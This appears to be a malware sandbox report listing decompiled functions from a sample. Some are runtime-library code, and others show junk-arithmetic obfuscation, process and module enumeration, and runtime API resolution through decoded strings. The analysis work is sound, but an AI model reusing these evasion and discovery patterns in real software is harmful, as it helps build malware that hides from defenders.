Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 888903860-0
Opcode ID: 65f9beb7004c5a6538913b43fd15d07ab483089a657b30b971617f5c94dc832f
Instruction ID: 6ec70dd30cdae710e99a0648e214c39f8e94375287dfbd377dd5a682a5648e09
Opcode Fuzzy Hash: 65f9beb7004c5a6538913b43fd15d07ab483089a657b30b971617f5c94dc832f
Instruction Fuzzy Hash: 6D21F335104601DFDB277F29D853DDAFBE4DF81758B21842DF7845E992EE35A8008A50

Uniqueness

Uniqueness Score: -1.00%

Function 003AFB80 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 138
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E003AFB80(void* __edx, void* __edi, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				char _v20;
				char _v28;
				void* __esi;
				char* _t34;
				char _t36;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t41;
				char* _t42;
				char _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr* _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t58;
				void* _t65;
				intOrPtr* _t77;

				_t76 = __edi;
				_t75 = __edx;
				_t34 =  *0x3d12d0; // 0x0
				_t71 = 0xffff0000;
				_v8 = _v8 & 0xffff0000;
				_t36 =  *_t34;
				_v12 = 0;
				if(_t36 == 0) {
					L31:
					_push(_a8);
					L32:
					_push(1);
					_push(_a4);
					E003ABB9C(_t71);
					L33:
					L34:
					return _a4;
				}
				_t39 = _t36 - 0x24;
				if(_t39 == 0) {
					_t40 =  *0x3d12d0; // 0x0
					_t41 =  *((intOrPtr*)(_t40 + 1));
					__eflags = _t41 - 0x24;
					if(_t41 == 0x24) {
						 *0x3d12d0 =  *0x3d12d0 + 2;
						_t42 =  *0x3d12d0; // 0x0
						_t43 =  *_t42;
						_t77 = _a8;
						__eflags = _t43 - 0x51;
						if(__eflags > 0) {
							_t44 = _t43 - 0x52;
							__eflags = _t44;
							if(_t44 == 0) {
								_t71 =  &_v12;
								E003AB7D8( &_v12, "volatile");
								__eflags =  *_t77;
								if( *_t77 != 0) {
									_t71 =  &_v12;
									E003AB968( &_v12, 0x20);
								}
								L30:
								_push("&&");
								L9:
								 *0x3d12d0 =  *0x3d12d0 + 1;
								_v20 =  *_t77;
								_push( &_v20);
								_push( &_v12);
								_push(_a4);
								_v16 =  *(_t77 + 4) | 0x00000100;
								E003AF532(_t71, _t75, _t76);
								goto L34;
							}
							_t51 = _t44 - 1;
							__eflags = _t51;
							if(_t51 == 0) {
								 *0x3d12d0 =  *0x3d12d0 + 1;
								L12:
								_t52 = _a4;
								 *(_t52 + 4) =  *(_t52 + 4) & 0xffff00ff;
								 *(_t52 + 4) = 2;
								 *_t52 = 0;
								return _t52;
							}
							__eflags = _t51 != 1;
							if(_t51 != 1) {
								goto L12;
							}
							 *0x3d12d0 =  *0x3d12d0 + 1;
							E003AB4D8(_a4, "std::nullptr_t");
							goto L34;
						}
						if(__eflags == 0) {
							goto L30;
						}
						_t55 = _t43;
						__eflags = _t55;
						if(_t55 == 0) {
							_push(_t77);
							goto L32;
						}
						_t56 = _t55 - 0x41;
						__eflags = _t56;
						if(_t56 == 0) {
							 *0x3d12d0 =  *0x3d12d0 + 1;
							E003AEA72(__edx, __edi, _t77, _a4, _t77);
							L5:
							goto L34;
						}
						_t58 = _t56 - 1;
						__eflags = _t58;
						if(_t58 == 0) {
							 *0x3d12d0 =  *0x3d12d0 + 1;
							E003AC959(__edx, _t77, _a4, _t77, 1);
							goto L33;
						}
						__eflags = _t58 != 1;
						if(_t58 != 1) {
							goto L12;
						}
						 *0x3d12d0 =  *0x3d12d0 + 1;
						_v8 = _v8 & 0xffff0000;
						_v12 = 0;
						E003AF7BD(0xffff0000, _t75, _a4, E003AEE54(0xffff0000,  &_v28, _t77, 0x3c9318,  &_v12, 0));
						goto L34;
					}
					__eflags = _t41;
					if(_t41 == 0) {
						goto L31;
					}
					goto L12;
				}
				_t65 = _t39 - 0x1d;
				_t77 = _a8;
				if(_t65 == 0) {
					L8:
					_push("&");
					goto L9;
				}
				if(_t65 == 1) {
					_t71 =  &_v12;
					E003AB7D8( &_v12, "volatile");
					__eflags =  *_t77;
					if( *_t77 != 0) {
						_t71 =  &_v12;
						E003AB968( &_v12, 0x20);
					}
					goto L8;
				} else {
					E003AF7BD(0xffff0000, __edx, _a4, _t77);
					goto L5;
				}
			}

0x003afb80
0x003afb80
0x003afb88
0x003afb93
0x003afb98
0x003afb9b
0x003afb9e
0x003afba1
0x003afd1a
0x003afd1a
0x003afd1d
0x003afd1d
0x003afd1f
0x003afd22
0x003afd27
0x003afd2a
0x00000000
0x003afd2a
0x003afba7
0x003afbaa
0x003afc16
0x003afc1b
0x003afc1e
0x003afc20
0x003afc3f
0x003afc46
0x003afc4b
0x003afc4e
0x003afc51
0x003afc54
0x003afcc6
0x003afcc6
0x003afcc9
0x003afcfa
0x003afcfd
0x003afd02
0x003afd04
0x003afd08
0x003afd0b
0x003afd0b
0x003afd10
0x003afd10
0x003afbe7
0x003afbec
0x003afbf2
0x003afbf8
0x003afbfc
0x003afbfd
0x003afc06
0x003afc09
0x00000000
0x003afc0e
0x003afccb
0x003afccb
0x003afccc
0x003afcea
0x003afc2a
0x003afc2a
0x003afc2d
0x003afc34
0x003afc38
0x00000000
0x003afc38
0x003afcce
0x003afccf
0x00000000
0x00000000
0x003afcd8
0x003afce3
0x00000000
0x003afce3
0x003afc56
0x00000000
0x00000000
0x003afc5c
0x003afc5c
0x003afc5e
0x003afcc3
0x00000000
0x003afcc3
0x003afc60
0x003afc60
0x003afc63
0x003afcaf
0x003afcb9
0x003afbc0
0x00000000
0x003afbc1
0x003afc65
0x003afc65
0x003afc66
0x003afc9c
0x003afca8
0x00000000
0x003afca8
0x003afc68
0x003afc69
0x00000000
0x00000000
0x003afc6b
0x003afc71
0x003afc83
0x003afc8f
0x00000000
0x003afc94
0x003afc22
0x003afc24
0x00000000
0x00000000
0x00000000
0x003afc24
0x003afbac
0x003afbaf
0x003afbb2
0x003afbe2
0x003afbe2
0x00000000
0x003afbe2
0x003afbb5
0x003afbcc
0x003afbcf
0x003afbd4
0x003afbd6
0x003afbda
0x003afbdd
0x003afbdd
0x00000000
0x003afbb7
0x003afbbb
0x00000000
0x003afbbb

APIs

UnDecorator::getBasicDataType.LIBCMT ref: 003AFBBB
DName::operator=.LIBCMT ref: 003AFBCF
DName::operator+=.LIBCMT ref: 003AFBDD
UnDecorator::getPtrRefType.LIBCMT ref: 003AFC09
UnDecorator::getDataIndirectType.LIBCMT ref: 003AFC86
UnDecorator::getBasicDataType.LIBCMT ref: 003AFC8F
operator+.LIBCMT ref: 003AFD22

Strings

volatile, xrefs: 003AFBC7, 003AFCF5
std::nullptr_t, xrefs: 003AFCDE

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
String ID: std::nullptr_t$volatile
API String ID: 2203807771-3726895890
Opcode ID: 7fbc5ce4d383a720c2728625a50d39531f27cd0b9347ab67897cec7608d34b42
Instruction ID: 09e2ebfd8bb71135434a7a37132195f24ed73e19f7eedf7c62a81a7af5e9bcd3
Opcode Fuzzy Hash: 7fbc5ce4d383a720c2728625a50d39531f27cd0b9347ab67897cec7608d34b42
Instruction Fuzzy Hash: 8141CD72400209BFCB17AFD4E889DA97B78FB07391F15847AE902AA166D7319A41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 003BDB1D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E003BDB1D(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t32;
				void* _t33;
				void* _t34;
				void* _t36;
				intOrPtr _t37;
				intOrPtr _t39;
				signed int* _t41;
				signed int _t44;
				signed int _t51;
				signed int _t54;
				signed int _t56;
				signed int _t58;
				signed int _t60;
				void* _t62;
				void* _t63;

				_t32 = _a4;
				_t63 = _t62 - 0x10;
				if(_t32 != 0) {
					_t51 = _a12;
					_t60 =  *_t32;
					_t56 = _a8;
					__eflags = _t56;
					if(_t56 == 0) {
						L4:
						_t33 =  *_t60;
						__eflags = _t33 - 0xe0434f4d;
						if(_t33 == 0xe0434f4d) {
							L22:
							__eflags = _t33 - 0xe06d7363;
							if(__eflags != 0) {
								L30:
								_t34 = E0039FFF2(_t51, _t56, __eflags);
								_t30 = _t34 + 0x90;
								 *_t30 =  *(_t34 + 0x90) + 1;
								__eflags =  *_t30;
								goto L31;
							} else {
								__eflags =  *((intOrPtr*)(_t60 + 0x10)) - 3;
								if(__eflags != 0) {
									goto L30;
								} else {
									_t37 =  *((intOrPtr*)(_t60 + 0x14));
									__eflags = _t37 - 0x19930520;
									if(_t37 == 0x19930520) {
										L27:
										__eflags =  *(_t60 + 0x1c);
										if(__eflags != 0) {
											goto L30;
										} else {
											__eflags =  *(E0039FFF2(_t51, _t56, __eflags) + 0x88);
											if(__eflags != 0) {
												goto L30;
											} else {
												goto L29;
											}
										}
									} else {
										__eflags = _t37 - 0x19930521;
										if(_t37 == 0x19930521) {
											goto L27;
										} else {
											__eflags = _t37 - 0x19930522;
											if(__eflags != 0) {
												goto L30;
											} else {
												goto L27;
											}
										}
									}
								}
							}
						} else {
							__eflags = _t33 - 0xe0434352;
							if(_t33 == 0xe0434352) {
								goto L22;
							} else {
								__eflags = _t51 & 0x00000040;
								if((_t51 & 0x00000040) == 0) {
									goto L22;
								} else {
									goto L7;
								}
							}
						}
					} else {
						__eflags =  *((char*)(_t56 + 8));
						if( *((char*)(_t56 + 8)) != 0) {
							L7:
							__eflags =  *_t60 - 0xe06d7363;
							if( *_t60 != 0xe06d7363) {
								L29:
								_t36 = 0;
							} else {
								__eflags =  *((intOrPtr*)(_t60 + 0x10)) - 3;
								if( *((intOrPtr*)(_t60 + 0x10)) != 3) {
									goto L29;
								} else {
									_t39 =  *((intOrPtr*)(_t60 + 0x14));
									__eflags = _t39 - 0x19930520;
									if(_t39 == 0x19930520) {
										L12:
										__eflags =  *(_t60 + 0x1c);
										if(__eflags != 0) {
											L15:
											_t41 =  *( *(_t60 + 0x1c) + 0xc);
											_v16 = _t56;
											_t58 =  *_t41;
											_v20 = _t51 | 0x80000000;
											_t54 =  &(_t41[1]);
											while(1) {
												__eflags = _t58;
												if(_t58 <= 0) {
													break;
												}
												_a4 =  *_t54;
												_t44 = E003BD07B( &_v20,  *_t54,  *(_t60 + 0x1c));
												_t63 = _t63 + 0xc;
												__eflags = _t44;
												if(__eflags != 0) {
													 *((intOrPtr*)(E0039FFF2(_t54, _t58, __eflags) + 0x90)) =  *((intOrPtr*)(_t45 + 0x90)) + 1;
													__eflags = _a16;
													if(__eflags != 0) {
														_push(_a4);
														_push( &_v20);
														_push(_a16);
														_push(_t60);
														E003BDA8B(_t54, _t58, _t60, __eflags);
													}
													L31:
													_t36 = 1;
													__eflags = 1;
												} else {
													_t58 = _t58 - 1;
													_t54 = _t54 + 4;
													__eflags = _t54;
													continue;
												}
												goto L32;
											}
											goto L29;
										} else {
											__eflags =  *(E0039FFF2(_t51, _t56, __eflags) + 0x88);
											if(__eflags == 0) {
												goto L29;
											} else {
												_t60 =  *(E0039FFF2(_t51, _t56, __eflags) + 0x88);
												goto L15;
											}
										}
									} else {
										__eflags = _t39 - 0x19930521;
										if(_t39 == 0x19930521) {
											goto L12;
										} else {
											__eflags = _t39 - 0x19930522;
											if(_t39 != 0x19930522) {
												goto L29;
											} else {
												goto L12;
											}
										}
									}
								}
							}
						} else {
							goto L4;
						}
					}
					L32:
					return _t36;
				} else {
					return _t32;
				}
			}

0x003bdb22
0x003bdb25
0x003bdb2a
0x003bdb2f
0x003bdb33
0x003bdb36
0x003bdb39
0x003bdb3b
0x003bdb43
0x003bdb43
0x003bdb45
0x003bdb4a
0x003bdc1b
0x003bdc1b
0x003bdc20
0x003bdc58
0x003bdc58
0x003bdc5d
0x003bdc5d
0x003bdc5d
0x00000000
0x003bdc22
0x003bdc22
0x003bdc26
0x00000000
0x003bdc28
0x003bdc28
0x003bdc2b
0x003bdc30
0x003bdc40
0x003bdc40
0x003bdc44
0x00000000
0x003bdc46
0x003bdc4b
0x003bdc52
0x00000000
0x00000000
0x00000000
0x00000000
0x003bdc52
0x003bdc32
0x003bdc32
0x003bdc37
0x00000000
0x003bdc39
0x003bdc39
0x003bdc3e
0x00000000
0x00000000
0x00000000
0x00000000
0x003bdc3e
0x003bdc37
0x003bdc30
0x003bdc26
0x003bdb50
0x003bdb50
0x003bdb55
0x00000000
0x003bdb5b
0x003bdb5b
0x003bdb5e
0x00000000
0x00000000
0x00000000
0x00000000
0x003bdb5e
0x003bdb55
0x003bdb3d
0x003bdb3d
0x003bdb41
0x003bdb64
0x003bdb64
0x003bdb6a
0x003bdc54
0x003bdc54
0x003bdb70
0x003bdb70
0x003bdb74
0x00000000
0x003bdb7a
0x003bdb7a
0x003bdb7d
0x003bdb82
0x003bdb96
0x003bdb96
0x003bdb9a
0x003bdbb9
0x003bdbbc
0x003bdbc5
0x003bdbc8
0x003bdbca
0x003bdbcd
0x003bdbef
0x003bdbef
0x003bdbf1
0x00000000
0x00000000
0x003bdbd7
0x003bdbdf
0x003bdbe4
0x003bdbe7
0x003bdbe9
0x003bdbfa
0x003bdc00
0x003bdc04
0x003bdc06
0x003bdc0c
0x003bdc0d
0x003bdc10
0x003bdc11
0x003bdc16
0x003bdc63
0x003bdc65
0x003bdc65
0x003bdbeb
0x003bdbeb
0x003bdbec
0x003bdbec
0x00000000
0x003bdbec
0x00000000
0x003bdbe9
0x00000000
0x003bdb9c
0x003bdba1
0x003bdba8
0x00000000
0x003bdbae
0x003bdbb3
0x00000000
0x003bdbb3
0x003bdba8
0x003bdb84
0x003bdb84
0x003bdb89
0x00000000
0x003bdb8b
0x003bdb8b
0x003bdb90
0x00000000
0x00000000
0x00000000
0x00000000
0x003bdb90
0x003bdb89
0x003bdb82
0x003bdb74
0x00000000
0x00000000
0x00000000
0x003bdb41
0x003bdc66
0x003bdc6a
0x003bdb2d
0x003bdb2d
0x003bdb2d

APIs

__getptd.LIBCMT ref: 003BDB9C
__getptd.LIBCMT ref: 003BDBAE

Strings

MOC, xrefs: 003BDB45
RCC, xrefs: 003BDB50
csm, xrefs: 003BDB64
csm, xrefs: 003BDC1B

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: __getptd
String ID: MOC$RCC$csm$csm
API String ID: 3384420010-1441736206
Opcode ID: 4d4e2d7535598c189cd3883cce7b847787f9841fb2e5e8c2826340c7392eaa69
Instruction ID: 71ddd979611ba3ade19edb70c2b57224d50837855f77f480cdce2e301f5acf96
Opcode Fuzzy Hash: 4d4e2d7535598c189cd3883cce7b847787f9841fb2e5e8c2826340c7392eaa69
Instruction Fuzzy Hash: 0C31C2315002058FCF36DF68C4857E97BA9EF5130CF6A4869DA4ACBA11F770E944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00399F60 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 179
processCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00399F60(void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				signed long long _v16;
				void* _v20;
				long long _v28;
				char _v288;
				int _v316;
				void* _v324;
				char _v325;
				char _v836;
				char _v1096;
				void* _v1384;
				short _t26;
				int _t28;
				void* _t31;
				void* _t37;
				intOrPtr _t45;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t69;
				intOrPtr _t72;
				intOrPtr _t74;
				short _t78;
				intOrPtr _t79;
				intOrPtr _t85;
				void* _t88;
				void* _t90;
				long long _t100;
				signed long long _t107;

				_t26 =  *0x3ce01c; // 0x9b827a58
				 *0x3ce524 = _t26;
				 *0x3ce01c =  *0x3ce01c - 1;
				_v325 = 0;
				_t59 = CreateToolhelp32Snapshot(2, 0);
				_v20 = _t59;
				_t94 = _t59;
				if(_t59 != 0) {
					_v324 = 0x128;
					_t28 = Process32First(_t59,  &_v324);
					_v16 =  *0x3ce520;
					_t61 =  *0x3ce580; // 0xffff
					_t100 =  *0x3ce380 +  *0x3c8058;
					_v8 = _t61;
					_v28 = _t100;
					asm("fild dword [ebp-0x4]");
					asm("fsubr qword [ebp-0xc]");
					 *0x3ce520 = _t100 + _v28;
					_t103 =  *0x3ce380 -  *0x3c75c8;
					 *0x3ce380 =  *0x3ce380 -  *0x3c75c8;
					__eflags = _t28;
					if(__eflags != 0) {
						_t85 = _a4;
						do {
							_t31 = E0038CF90(__eflags, _t103, 0xe8d, 0xc);
							_push( &_v288);
							asm("fsubp st1, st0");
							 *0x3ce4c8 =  *0x3c8054 -  *0x3ce1e0;
							_t107 =  *0x3ce1e0;
							asm("fld1");
							asm("faddp st1, st0");
							 *0x3ce1e0 = _t107;
							E0039E0C2( &_v836, 0x1ff, _t31, _v316);
							E00396570(0xc, _t31);
							_t90 = _t90 + 0x24;
							E00390980(_t85, _t107,  &_v836);
							_t37 = CreateToolhelp32Snapshot(8, _v316);
							_t78 =  *0x3ce108; // 0x5dc4
							_t88 = _t37;
							_v8 = _t78;
							_v1384 = 0x224;
							asm("fild dword [ebp-0x4]");
							_v16 = _t107;
							_t103 =  *0x3ce420 * _v16;
							 *0x3ce108 = E0039CABC();
							__eflags = Module32First(_t88,  &_v1384);
							if(__eflags == 0) {
								E00390980(_t85, _t103, E0038CF90(__eflags, _t103, 0x2885, 9));
								E00396570(9, _t41);
								_t59 = _v20;
								_t90 = _t90 + 0x10;
							} else {
								E00390980(_t85, _t103,  &_v1096);
							}
							E0038AF70(0xa);
							_t45 =  *0x3ce290; // 0xbbaa
							_v8 = _t45;
							asm("fild dword [ebp-0x4]");
							 *0x3ce210 = _t103;
							CloseHandle(_t88);
							_t79 =  *0x3ce1fc; // 0x80000000
							_t69 =  *0x3ce080; // 0xf362bf6c
							 *0x3ce1fc =  *0x3ce1fc + 0xe0884aaa - _t79 - _t69;
							 *0x3ce080 =  *0x3ce080 - 1;
							_v324 = 0x128;
							__eflags = Process32Next(_t59,  &_v324);
						} while (__eflags != 0);
					}
					CloseHandle(_t59);
					return 1;
				} else {
					E00390980(_a4, __fp0, E0038CF90(_t94, __fp0, 0x3ef8, 0x11));
					E00396570(0x11, _t52);
					 *0x3ce288 =  *0x3ce288 + 1;
					_t72 =  *0x3ce288; // 0x6ce1ec48
					if(_t72 +  *0x3ce3e8 <= 0xfc71a60d) {
						_t74 =  *0x3ce2ec; // 0x76d570f4
						 *0x3ce30c =  *0x3ce30c + 0x2516096b - _t74;
						__eflags = 0;
						return 0;
					} else {
						 *0x3ce2d8 = ( *0x3ce2d8 & 0x0000ffff) * 0xde4e51fd;
						return 0;
					}
				}
			}

0x00399f69
0x00399f72
0x00399f78
0x00399f80
0x00399f8d
0x00399f8f
0x00399f92
0x00399f94
0x0039a014
0x0039a01e
0x0039a02a
0x0039a033
0x0039a03a
0x0039a043
0x0039a046
0x0039a049
0x0039a04f
0x0039a052
0x0039a05e
0x0039a064
0x0039a06a
0x0039a06c
0x0039a073
0x0039a080
0x0039a087
0x0039a0a6
0x0039a0ad
0x0039a0af
0x0039a0b5
0x0039a0c1
0x0039a0c5
0x0039a0cd
0x0039a0d3
0x0039a0db
0x0039a0e0
0x0039a0ec
0x0039a0fa
0x0039a100
0x0039a107
0x0039a10c
0x0039a10f
0x0039a119
0x0039a11c
0x0039a125
0x0039a135
0x0039a141
0x0039a143
0x0039a169
0x0039a171
0x0039a176
0x0039a179
0x0039a145
0x0039a14e
0x0039a14e
0x0039a180
0x0039a185
0x0039a18e
0x0039a192
0x0039a195
0x0039a19b
0x0039a1a1
0x0039a1a7
0x0039a1bc
0x0039a1c2
0x0039a1ca
0x0039a1da
0x0039a1da
0x0039a1e2
0x0039a1e4
0x0039a1f4
0x00399f96
0x00399fab
0x00399fb3
0x00399fb8
0x00399fbe
0x00399fd3
0x00399ff1
0x00399ffe
0x0039a005
0x0039a00b
0x00399fd5
0x00399fe3
0x00399ff0
0x00399ff0
0x00399fd3

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00399F87
Process32First.KERNEL32(00000000,?), ref: 0039A01E
__snprintf.LIBCMT ref: 0039A0D3
CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 0039A0FA
Module32First.KERNEL32(00000000,00000224), ref: 0039A13B
CloseHandle.KERNEL32(00000000,0000000A,?,00000000), ref: 0039A19B

Part of subcall function 0038CF90: _malloc.LIBCMT ref: 0038CFC7

Part of subcall function 00396570: _memset.LIBCMT ref: 00396593
Part of subcall function 00396570: _free.LIBCMT ref: 00396599

Strings

Hl, xrefs: 00399FB8, 00399FBE

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: CreateFirstSnapshotToolhelp32$CloseHandleModule32Process32__snprintf_free_malloc_memset
String ID: Hl
API String ID: 3285749804-1007200271
Opcode ID: 07c53369ee743b9a0b0f3dd08c33296bddb1696a98cc1d249f420c728ba308a1
Instruction ID: dcd8893e31b249fb4b722da9f3e88b7a4b965ca563621604c64a3eb91f852e33
Opcode Fuzzy Hash: 07c53369ee743b9a0b0f3dd08c33296bddb1696a98cc1d249f420c728ba308a1
Instruction Fuzzy Hash: 2061D371A00214DFEB16AF65EC85FA97B7CFB88301F004595F508D72A5EB707A64CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00394F40 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 178
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00394F40(void* __ebx, void* __edi, long long __fp0) {
				short _v6;
				char _v8;
				intOrPtr _v12;
				long long _v16;
				long long _v24;
				signed int _v32;
				signed int _t20;
				intOrPtr _t23;
				signed char _t27;
				void* _t29;
				void* _t31;
				short _t34;
				short _t36;
				CHAR* _t39;
				CHAR* _t41;
				struct HINSTANCE__* _t43;
				intOrPtr* _t46;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				struct HINSTANCE__* _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				short _t63;
				intOrPtr _t64;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t79;
				long long _t102;

				_t20 =  *0x3ce2fc; // 0x3a84af9e
				 *0x3ce2fc = _t20 * 0x702c0532;
				 *0x3ce288 =  *0x3ce288 + 1;
				_t51 =  *0x3ce288; // 0x6ce1ec48
				_v12 = _t51 + 0x2d5138c2;
				asm("fild dword [ebp-0x8]");
				_v16 = __fp0;
				_t59 =  *0x3d0758; // 0x494
				_t94 =  *0x3ce278 + _v16;
				 *0x3ce278 = _t94;
				E0038F090(_t94, _t59);
				_t23 =  *0x3d096c; // 0x0
				_t76 = _t75 + 4;
				_t81 = _t23;
				if(_t23 != 0) {
					__eflags = _t23 - 1;
					if(__eflags != 0) {
						L11:
						if( *0x3d096c != 0xffffffff) {
							L18:
							_t60 =  *0x3d0758; // 0x494
							E0038D240(_t94, _t60);
							return _v8;
						}
						L12:
						 *0x3ce298 =  *0x3ce298 - 1;
						_t61 =  *0x3ce298; // 0xfb57
						_t27 = _t61 + 0x7f07972;
						if(_t27 <= 0xe0591c12) {
							_t53 =  *0x3ce37c; // 0x277c3928
							_v12 = _t53;
							asm("fild dword [ebp-0x8]");
							_v32 = _t94;
							_t94 =  *0x3ce3c8 -  *0x3c79c0;
							asm("fsubr qword [ebp-0x1c]");
							 *0x3ce37c = E0039CABC();
						} else {
							asm("fucompp");
							asm("fnstsw ax");
							asm("fld1");
							_t94 =  *0x3ce600 + st0;
							asm("fxch st0, st1");
							 *0x3ce600 = _t94;
							_t90 = _t27 & 0x00000044;
							if((_t27 & 0x00000044) != 0) {
								st0 = _t94;
							} else {
								asm("fsubr qword [0x3ce2e0]");
								 *0x3ce2e0 = _t94;
								asm("fsubr qword [0x3c79d0]");
								_v32 =  *0x3ce2e0 -  *0x3c79c8;
								_t94 =  *0x3ce02c * _v32;
								 *0x3ce02c =  *0x3ce02c * _v32;
							}
						}
						_t29 = E0039CCDD(_t90);
						_v8 = _t29 + E0039CCDD(_t90);
						_t31 = E0039CCDD(_t90);
						_v6 = _t31 + E0039CCDD(_t90);
						goto L18;
					}
					L9:
					_t62 =  *0x3d0960; // 0x0
					_push( &_v8);
					_push(4);
					_push(_t62);
					if( *0x3d0964() == 0) {
						_t34 =  *0x3ce230; // 0xeabf
						_t55 =  *0x3ce11c; // 0x760d9cf6
						 *0x3d096c = 0xffffffff;
						 *0x3ce230 = _t55 + _t34;
					}
					goto L11;
				}
				_t36 =  *0x3ce36c; // 0x1baf
				_v12 = _t36;
				asm("fild dword [ebp-0x8]");
				_v32 = _t94;
				_t102 =  *0x3ce60c;
				_t63 =  *0x3ce5d8; // 0xbe1d
				_v24 = _t102;
				_v12 = _t63;
				asm("fild dword [ebp-0x8]");
				_t94 = _t102 + _v24;
				asm("fsubr qword [ebp-0x1c]");
				 *0x3ce36c = E0039CABC();
				 *0x3ce5d8 =  *0x3ce5d8 - 1;
				_t39 = E0038CF90(_t81, _t94, 0xea2, 0x15);
				_t58 =  *0x3d0310; // 0x76a00000
				_t66 = _t39;
				 *0x3d0968 = GetProcAddress(_t58, _t39);
				_t41 = E0038CF90(_t81, _t94, 0x3003, 0xf);
				_t64 =  *0x3ce4d0; // 0x6c745516
				_t79 = _t76 + 0x10;
				_t74 = _t41;
				if(_t64 == 0x8c461eb7) {
					asm("fld1");
					asm("faddp st1, st0");
					_v32 =  *0x3ce584;
					_t94 =  *0x3ce184 +  *0x3c79e0;
					asm("fsubr qword [ebp-0x1c]");
					 *0x3ce584 = _t94;
				}
				E00396570(0x15, _t66);
				_t43 =  *0x3d0310; // 0x76a00000
				 *0x3d0964 = GetProcAddress(_t43, _t74);
				E00396570(0xf, _t74);
				_t46 =  *0x3d0968; // 0x0
				_t76 = _t79 + 0x10;
				if(_t46 == 0 ||  *0x3d0964 == 0) {
					L7:
					 *0x3ce2a8 = 0x4ec9a48d;
					 *0x3d096c = 0xffffffff;
					goto L12;
				} else {
					_push(0);
					_push(1);
					_push(0);
					_push(0);
					_push(0x3d0960);
					if( *_t46() == 0) {
						goto L7;
					}
					 *0x3d096c = 1;
					goto L9;
				}
			}

0x00394f46
0x00394f51
0x00394f56
0x00394f5c
0x00394f68
0x00394f6c
0x00394f6f
0x00394f78
0x00394f7e
0x00394f82
0x00394f88
0x00394f8d
0x00394f92
0x00394f95
0x00394f97
0x003950c2
0x003950c5
0x003950fe
0x00395105
0x003951d1
0x003951d1
0x003951d8
0x003951e7
0x003951e7
0x0039510b
0x0039510b
0x00395112
0x0039511c
0x00395126
0x00395181
0x00395187
0x0039518a
0x0039518d
0x00395196
0x0039519c
0x003951a4
0x00395128
0x00395134
0x00395136
0x0039513e
0x00395140
0x00395142
0x00395144
0x0039514a
0x0039514d
0x003951ab
0x0039514f
0x0039514f
0x00395155
0x00395161
0x0039516d
0x00395176
0x00395179
0x00395179
0x0039514d
0x003951ad
0x003951bb
0x003951bf
0x003951cd
0x00000000
0x003951cd
0x003950c7
0x003950c7
0x003950d0
0x003950d1
0x003950d3
0x003950dc
0x003950de
0x003950e4
0x003950ed
0x003950f7
0x003950f7
0x00000000
0x003950dc
0x00394f9d
0x00394fa6
0x00394fab
0x00394fae
0x00394fb1
0x00394fb7
0x00394fc1
0x00394fc4
0x00394fc7
0x00394fca
0x00394fcd
0x00394fd7
0x00394fdd
0x00394fe9
0x00394fee
0x00394ffd
0x0039500a
